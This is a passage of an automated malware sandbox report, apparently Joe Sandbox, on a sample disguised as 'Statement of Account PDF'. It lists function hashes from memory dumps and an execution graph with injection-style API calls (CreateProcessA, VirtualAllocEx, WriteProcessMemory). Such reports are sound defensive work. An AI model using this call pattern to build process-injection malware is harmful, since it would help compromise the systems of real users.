                                                        • Opcode Fuzzy Hash: 4bb503cf5fb987db2b63b02be5523f2c6345c0b2100a45fdc5c854f59c24d8a2
                                                        • Instruction Fuzzy Hash: 6401A435F20328ABCF14AA6AE850A9EB779FB85314F10443DE905EB744DB75AC048B84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00FBD8C4 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072389323.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fbd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 722069d2b342d690d4b0d571653d29b18a0d3bf1d6bb7f3b2b6e0f009dd456cb
                                                        • Instruction ID: a83257c890e5c536a0a51c9ec5d5450e1b9997d4a784e0e50a77547c3155780f
                                                        • Opcode Fuzzy Hash: 722069d2b342d690d4b0d571653d29b18a0d3bf1d6bb7f3b2b6e0f009dd456cb
                                                        • Instruction Fuzzy Hash: 53F0CD72408340AEEB108E1AD8C4BA6FFA8EF51334F18C45AED480A286D2799840CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300E4C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c0efea65f26c95eda1ecf4e45a0032c0a75fe270e321e975de796344e9b3a14
                                                        • Instruction ID: 6e973a5cf39fa6ff272eabc2e46076604a62734841f1ecab73dfa9767fa99d08
                                                        • Opcode Fuzzy Hash: 7c0efea65f26c95eda1ecf4e45a0032c0a75fe270e321e975de796344e9b3a14
                                                        • Instruction Fuzzy Hash: 1E010C71900619DFDB1ACF69C4583AEBBF1BF49354F248169F418AA290D7744A40CFD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300EF0 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14f3b3a8ccf2538ff6e1c0229d0f4b92f518a858d3b838966d4b55d4855a9767
                                                        • Instruction ID: a4f9ffb810aefd165cddaa660bae4a9637fa092fa666d15508efa3e407c92cd1
                                                        • Opcode Fuzzy Hash: 14f3b3a8ccf2538ff6e1c0229d0f4b92f518a858d3b838966d4b55d4855a9767
                                                        • Instruction Fuzzy Hash: 77F082717042046FD7049B7E988495BFBEDEFCA720B2444BEE144C7361CA71AC01C6A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300E58 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a64df600c8929dd39e05c2391265d0a189b39729625f5b204113ea3c2bea3fd2
                                                        • Instruction ID: 38a02c7e2f2b27fd2535dc444ebf3841361cf9a2a00472f64f4bb6f70c5265aa
                                                        • Opcode Fuzzy Hash: a64df600c8929dd39e05c2391265d0a189b39729625f5b204113ea3c2bea3fd2
                                                        • Instruction Fuzzy Hash: B401E871800619DFEB19CF6AC4147AEBAF5AF49394F248229E828AA290D7744A40CBD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300EF8 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16d6f0deb240ba19097e968a80c542cdc5aac6672499fa293f1046e42f621cda
                                                        • Instruction ID: 3c2a8a2a5780d95a6c1b623602474e50bbae743ce92c57fd0df0314f7768f97c
                                                        • Opcode Fuzzy Hash: 16d6f0deb240ba19097e968a80c542cdc5aac6672499fa293f1046e42f621cda
                                                        • Instruction Fuzzy Hash: 4AE06D717002186FD3049A5E9C80E6BFBEEEFC9B20B21807AF544D7361CAB0AC0086A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01301218 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b21159a8241fefb36bfa23a186794a0f20e198e8c4389f16d523c482b85984a
                                                        • Instruction ID: cb075927e731b576d45e69af5700d7b5d88c726a9efc49e835f3255027deb6a4
                                                        • Opcode Fuzzy Hash: 8b21159a8241fefb36bfa23a186794a0f20e198e8c4389f16d523c482b85984a
                                                        • Instruction Fuzzy Hash: 06F0D4B0E0420A9FDB54DFA9D855ABEBBF8AB48304F1085A9D918E7340E77496048BD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01301209 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b756ccc54c205113e969830ffe10921ae7e7a00351b63b5096fca36ec6d906b
                                                        • Instruction ID: 06db8254831a729a6e462f3e8ecbc2941cbab437fb0774059891bb68383de379
                                                        • Opcode Fuzzy Hash: 2b756ccc54c205113e969830ffe10921ae7e7a00351b63b5096fca36ec6d906b
                                                        • Instruction Fuzzy Hash: AEF0C4B0D0030A9FDB48EFA9D5556AEBFF4AF48318F10496DD514E7251D37196118F90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695FF68 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4e39ff1e40be87ea90750c5d528b4dcd7d7d1fada7dd59552e22c80d6ccd505
                                                        • Instruction ID: b4b100545f8eef6562c787c62191b62aa215e0ec1380ebe380d656b5d88c5e33
                                                        • Opcode Fuzzy Hash: a4e39ff1e40be87ea90750c5d528b4dcd7d7d1fada7dd59552e22c80d6ccd505
                                                        • Instruction Fuzzy Hash: DBF03075E10714AB8B34CFA9D84449ABBF9EF49710B41856AE89593A00D731EA14CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300F44 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30e74ad349c8d91f78166d084fb66f54e1d8b248cf7298bee9160c616cc850c8
                                                        • Instruction ID: 34f27b9430cd7819272ca7f78914fee479b2e15317b8ce5816019116cc3e4373
                                                        • Opcode Fuzzy Hash: 30e74ad349c8d91f78166d084fb66f54e1d8b248cf7298bee9160c616cc850c8
                                                        • Instruction Fuzzy Hash: 9DE04F363042106FC3148A6EEC98D46FBE9EF89634B55806AF609C7761C931AC01C7A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06956448 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef62a5773b66f5d32631520c2d317e137227a0ba9f564e39befaf82eb1dfbf61
                                                        • Instruction ID: 784146825250c5f457f5fcc54f53ea62386977fd6e5eb8b2f255fc0c1e7ccfe9
                                                        • Opcode Fuzzy Hash: ef62a5773b66f5d32631520c2d317e137227a0ba9f564e39befaf82eb1dfbf61
                                                        • Instruction Fuzzy Hash: 79E0D870E181889FDF91CFB49A9535A3B799B42208F3149E6C848CB293E175CA028391
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300F48 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bf9e2c139efac2e0415e6a93131072d981b16a081d5e858653b0fa2ed5be73
                                                        • Instruction ID: 88104f38a95f8a46cb265b9e009f03c8e5c0adb4ff67217fabb4a8d14613ed29
                                                        • Opcode Fuzzy Hash: a4bf9e2c139efac2e0415e6a93131072d981b16a081d5e858653b0fa2ed5be73
                                                        • Instruction Fuzzy Hash: 99E08C363002106FC3148A0FEC88D06FBEDEFC8630B50802AFA09C7360CA30AC01CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013011B1 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e6635e9219084152dc54f988b0aee8a40bd8e5e60c32845fed7e24525953578
                                                        • Instruction ID: c3c6045b1e0c8a9961430802c5c90784769daf75e5e65a7916eee5df069ea789
                                                        • Opcode Fuzzy Hash: 7e6635e9219084152dc54f988b0aee8a40bd8e5e60c32845fed7e24525953578
                                                        • Instruction Fuzzy Hash: 3FF0D4B091020ADFCB44EF79C514659BBF0BF49308F1189AED015E7262E7759610CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06956458 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                                        • Instruction ID: 8caf1b40fdfcf8e01127663c6c3da19b522df7eca5d9b28b26d07a629909c13e
                                                        • Opcode Fuzzy Hash: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                                        • Instruction Fuzzy Hash: 80E0C2B0E10108ABDF50CEB4D95575A77BDD701204F3185A4DC08C7611E172CA028380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013012A9 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5c31106e390d81d86a962560ef6a4cf26d0fe5045b47e3dcff49dc9196d2ef0
                                                        • Instruction ID: 8a6f072d29791a349bf5e7aae48749591f5214a7d838f8e9251c2bbc11d66ad8
                                                        • Opcode Fuzzy Hash: d5c31106e390d81d86a962560ef6a4cf26d0fe5045b47e3dcff49dc9196d2ef0
                                                        • Instruction Fuzzy Hash: DBE08C325483089FCB82DFB8D4508D13BF4FF3932070080AAE504CB462E2269926DB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013011C0 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c804bd79a79115e9377354dc1530c84b0454aa0d174ce725863c6be1840db767
                                                        • Instruction ID: 9011dc5b1e7af29fdd564a235b03501f67cd71bfbe9e012af8c1f2644bbefb6e
                                                        • Opcode Fuzzy Hash: c804bd79a79115e9377354dc1530c84b0454aa0d174ce725863c6be1840db767
                                                        • Instruction Fuzzy Hash: A2E0B6B0D44209DFD744EFB9C915A5EBBF4BF08304F1185A9D019E7352EBB496048F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 06957668 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2222239885
                                                        • Opcode ID: 1b0a0f9c98baa532c801f818c4e8ebd05dcd001bcbdabd0b2557559c2466b1c2
                                                        • Instruction ID: 0509261006313a7a40a786badc9cc90fb5b89405e375a9b77cbbecfbe043b5e7
                                                        • Opcode Fuzzy Hash: 1b0a0f9c98baa532c801f818c4e8ebd05dcd001bcbdabd0b2557559c2466b1c2
                                                        • Instruction Fuzzy Hash: B0124D30E002198FDB68DFA5D954A9EB7F6BF84304F2185A9D409AF754DB309E85CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695A8F8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: f4ea76059667c79aa8e0b66cfed59996c275be8d0268f532d1ffb9fe9a45232e
                                                        • Instruction ID: 4a86878e7db037cea6c300faf1cd9f71f849416d27a535178c6f825a75c392aa
                                                        • Opcode Fuzzy Hash: f4ea76059667c79aa8e0b66cfed59996c275be8d0268f532d1ffb9fe9a45232e
                                                        • Instruction Fuzzy Hash: C5919130E0020D9FEB64EF64DA54BAE77F6BF84310F218629E8019B758DB749C45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06957068 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-390881366
                                                        • Opcode ID: c3b0464ba6bdcb339693f16d64405b30707782a1348f30dbe5926d8a202e2c10
                                                        • Instruction ID: de44147db1fea5759dc9f44399deb3e31dd005f97588dea8eb5b1ac8b00971b6
                                                        • Opcode Fuzzy Hash: c3b0464ba6bdcb339693f16d64405b30707782a1348f30dbe5926d8a202e2c10
                                                        • Instruction Fuzzy Hash: 85F13C30B01209CFDB58EBA4D594AAEB7B6FF84300F218568D8459B75CDB35ED86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069583A0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: ce410cc8e98aadab5e97643429f80d4f14e77b53da0424e1f6d9ddc1f20828c9
                                                        • Instruction ID: 4fe4fdd933293b242a3dda946318b000e5a8c29c950b5a26a12ee04a36e56b44
                                                        • Opcode Fuzzy Hash: ce410cc8e98aadab5e97643429f80d4f14e77b53da0424e1f6d9ddc1f20828c9
                                                        • Instruction Fuzzy Hash: 0AB16C30B102198FDB54EF69D694A9EB7B6FF84300F258869D806DB759DB35DC82CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069587B8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q$$^q$$^q
                                                        • API String ID: 0-2454687669
                                                        • Opcode ID: e62ce898ee21218dad0e8e154234c5e25c34d6138ca20f7f886749b87c70b39e
                                                        • Instruction ID: 423a7c8e0f0f4ac093678f1e02392bdf17ad72dd756d6113be0deab52e824391
                                                        • Opcode Fuzzy Hash: e62ce898ee21218dad0e8e154234c5e25c34d6138ca20f7f886749b87c70b39e
                                                        • Instruction Fuzzy Hash: B8511730B002159FCB58EB29DA64A6E77F5FF84304F118968E812DB7A9DB30EC45CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695AC8B Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 1bbf31ca59f75aafeb433ded2d38b08562fc00ba271d7769fa4af16c0164477d
                                                        • Instruction ID: 5a1091eea69abe178fbd100b28a52d884c5b9b5ff195a07a547ab8f0170dc1b3
                                                        • Opcode Fuzzy Hash: 1bbf31ca59f75aafeb433ded2d38b08562fc00ba271d7769fa4af16c0164477d
                                                        • Instruction Fuzzy Hash: 87518D30E102098FDF65EB64E5906ADB7B6FB84200F218A2AE845DB758DB34EC45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:10.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:380
                                                        Total number of Limit Nodes:29
                                                        execution_graph 60267 7ad01c 60268 7ad034 60267->60268 60269 7ad08e 60268->60269 60274 23f1c9c 60268->60274 60282 23f3728 60268->60282 60290 23f29b7 60268->60290 60294 23f29c8 60268->60294 60275 23f1ca7 60274->60275 60277 23f3789 60275->60277 60298 23f1d9d CallWindowProcW CallWindowProcW 60275->60298 60278 23f37f3 60277->60278 60299 23f1d9d CallWindowProcW CallWindowProcW 60277->60299 60280 23f380b 60278->60280 60300 23f1d9d CallWindowProcW CallWindowProcW 60278->60300 60284 23f3765 60282->60284 60285 23f3789 60284->60285 60301 23f1d9d CallWindowProcW CallWindowProcW 60284->60301 60286 23f37f3 60285->60286 60302 23f1d9d CallWindowProcW CallWindowProcW 60285->60302 60289 23f380b 60286->60289 60303 23f1d9d CallWindowProcW CallWindowProcW 60286->60303 60289->60289 60291 23f29ee 60290->60291 60292 23f1c9c 2 API calls 60291->60292 60293 23f2a0f 60292->60293 60293->60269 60295 23f29ee 60294->60295 60296 23f1c9c 2 API calls 60295->60296 60297 23f2a0f 60296->60297 60297->60269 60298->60277 60299->60278 60300->60280 60301->60285 60302->60286 60303->60289 59939 7f4668 59940 7f467a 59939->59940 59941 7f4686 59940->59941 59943 7f4779 59940->59943 59944 7f479d 59943->59944 59948 7f4888 59944->59948 59952 7f4877 59944->59952 59950 7f48af 59948->59950 59949 7f498c 59949->59949 59950->59949 59956 7f4538 59950->59956 59954 7f4887 59952->59954 59953 7f498c 59953->59953 59954->59953 59955 7f4538 CreateActCtxA 59954->59955 59955->59953 59957 7f5d18 CreateActCtxA 59956->59957 59959 7f5ddb 59957->59959 59959->59959 60259 7fe1a8 DuplicateHandle 60260 7fe23e 60259->60260 60304 23ff358 60305 23ff37b 60304->60305 60306 23ff398 60305->60306 60309 68f88f9 60305->60309 60313 68f8908 60305->60313 60310 68f8901 60309->60310 60317 68f1894 60310->60317 60312 68f899a 60312->60312 60314 68f8930 60313->60314 60315 68f1894 DrawTextExW 60314->60315 60316 68f899a 60315->60316 60318 68f189f 60317->60318 60319 68f44b2 60318->60319 60321 68f18b4 60318->60321 60319->60312 60322 68f18bf 60321->60322 60326 68f5168 60322->60326 60330 68f5162 60322->60330 60323 68f514f 60323->60319 60327 68f5171 60326->60327 60334 68f51a6 60327->60334 60331 68f5169 60330->60331 60333 68f51a6 DrawTextExW 60331->60333 60332 68f5196 60332->60323 60333->60332 60335 68f51ad 60334->60335 60336 68f5196 60335->60336 60339 68f58d0 60335->60339 60344 68f58e0 60335->60344 60336->60323 60340 68f58e1 60339->60340 60341 68f5a0e 60340->60341 60349 68f8af8 60340->60349 60354 68f8b08 60340->60354 60341->60336 60345 68f5908 60344->60345 60346 68f5a0e 60345->60346 60347 68f8af8 DrawTextExW 60345->60347 60348 68f8b08 DrawTextExW 60345->60348 60346->60336 60347->60346 60348->60346 60350 68f8b08 60349->60350 60359 68f8f60 60350->60359 60364 68f8f70 60350->60364 60351 68f8b94 60351->60341 60355 68f8b1e 60354->60355 60357 68f8f60 DrawTextExW 60355->60357 60358 68f8f70 DrawTextExW 60355->60358 60356 68f8b94 60356->60341 60357->60356 60358->60356 60360 68f8f71 60359->60360 60368 68f8fa1 60360->60368 60373 68f8fb0 60360->60373 60361 68f8f8e 60361->60351 60365 68f8f8e 60364->60365 60366 68f8fa1 DrawTextExW 60364->60366 60367 68f8fb0 DrawTextExW 60364->60367 60365->60351 60366->60365 60367->60365 60369 68f8fe1 60368->60369 60370 68f900e 60369->60370 60378 68f9020 60369->60378 60383 68f9030 60369->60383 60370->60361 60374 68f8fe1 60373->60374 60375 68f900e 60374->60375 60376 68f9020 DrawTextExW 60374->60376 60377 68f9030 DrawTextExW 60374->60377 60375->60361 60376->60375 60377->60375 60380 68f9051 60378->60380 60379 68f9066 60379->60370 60380->60379 60381 68f80d8 DrawTextExW 60380->60381 60382 68f90c1 60381->60382 60385 68f9051 60383->60385 60384 68f9066 60384->60370 60385->60384 60386 68f80d8 DrawTextExW 60385->60386 60387 68f90c1 60386->60387 59997 6ed6650 59998 6ed6657 59997->59998 60003 6ed94d6 59998->60003 60024 6ed9470 59998->60024 60044 6ed9460 59998->60044 59999 6ed6669 60004 6ed94d9 60003->60004 60005 6ed9464 60003->60005 60006 6ed9492 60005->60006 60064 6ed986d 60005->60064 60076 6ed9b73 60005->60076 60081 6ed9ab4 60005->60081 60086 6ed98db 60005->60086 60098 6ed9ade 60005->60098 60107 6ed9b5f 60005->60107 60112 6ed9a1f 60005->60112 60121 6ed9cdf 60005->60121 60130 6ed9f1c 60005->60130 60135 6ed9842 60005->60135 60147 6ed9e26 60005->60147 60156 6eda225 60005->60156 60165 6ed9c88 60005->60165 60172 6ed9b49 60005->60172 60182 6ed99ce 60005->60182 60191 6ed9bac 60005->60191 60195 6ed99ad 60005->60195 60006->59999 60025 6ed948a 60024->60025 60026 6ed9492 60025->60026 60027 6ed986d 6 API calls 60025->60027 60028 6ed99ad 4 API calls 60025->60028 60029 6ed9bac 2 API calls 60025->60029 60030 6ed99ce 4 API calls 60025->60030 60031 6ed9b49 4 API calls 60025->60031 60032 6ed9c88 4 API calls 60025->60032 60033 6eda225 4 API calls 60025->60033 60034 6ed9e26 4 API calls 60025->60034 60035 6ed9842 6 API calls 60025->60035 60036 6ed9f1c 2 API calls 60025->60036 60037 6ed9cdf 4 API calls 60025->60037 60038 6ed9a1f 4 API calls 60025->60038 60039 6ed9b5f 2 API calls 60025->60039 60040 6ed9ade 4 API calls 60025->60040 60041 6ed98db 6 API calls 60025->60041 60042 6ed9ab4 2 API calls 60025->60042 60043 6ed9b73 2 API calls 60025->60043 60026->59999 60027->60026 60028->60026 60029->60026 60030->60026 60031->60026 60032->60026 60033->60026 60034->60026 60035->60026 60036->60026 60037->60026 60038->60026 60039->60026 60040->60026 60041->60026 60042->60026 60043->60026 60045 6ed948a 60044->60045 60046 6ed9492 60045->60046 60047 6ed986d 6 API calls 60045->60047 60048 6ed99ad 4 API calls 60045->60048 60049 6ed9bac 2 API calls 60045->60049 60050 6ed99ce 4 API calls 60045->60050 60051 6ed9b49 4 API calls 60045->60051 60052 6ed9c88 4 API calls 60045->60052 60053 6eda225 4 API calls 60045->60053 60054 6ed9e26 4 API calls 60045->60054 60055 6ed9842 6 API calls 60045->60055 60056 6ed9f1c 2 API calls 60045->60056 60057 6ed9cdf 4 API calls 60045->60057 60058 6ed9a1f 4 API calls 60045->60058 60059 6ed9b5f 2 API calls 60045->60059 60060 6ed9ade 4 API calls 60045->60060 60061 6ed98db 6 API calls 60045->60061 60062 6ed9ab4 2 API calls 60045->60062 60063 6ed9b73 2 API calls 60045->60063 60046->59999 60047->60046 60048->60046 60049->60046 60050->60046 60051->60046 60052->60046 60053->60046 60054->60046 60055->60046 60056->60046 60057->60046 60058->60046 60059->60046 60060->60046 60061->60046 60062->60046 60063->60046 60065 6ed984b 60064->60065 60204 6ed60a4 60065->60204 60208 6ed60b0 60065->60208 60066 6ed9991 60067 6ed9db8 60066->60067 60074 6ed5968 VirtualAllocEx 60066->60074 60075 6ed5960 VirtualAllocEx 60066->60075 60067->60006 60068 6eda2a7 60069 6ed9b39 60069->60068 60070 6ed5a28 WriteProcessMemory 60069->60070 60071 6ed5a22 WriteProcessMemory 60069->60071 60070->60069 60071->60069 60074->60069 60075->60069 60077 6ed9b1c 60076->60077 60077->60076 60212 6ed5a22 60077->60212 60216 6ed5a28 60077->60216 60078 6eda2ea 60082 6ed9ac4 60081->60082 60084 6ed5a28 WriteProcessMemory 60082->60084 60085 6ed5a22 WriteProcessMemory 60082->60085 60083 6eda055 60084->60083 60085->60083 60087 6ed98e1 60086->60087 60094 6ed60a4 CreateProcessA 60087->60094 60095 6ed60b0 CreateProcessA 60087->60095 60088 6ed9991 60089 6ed9db8 60088->60089 60220 6ed5960 60088->60220 60224 6ed5968 60088->60224 60089->60006 60090 6eda2a7 60091 6ed9b39 60091->60090 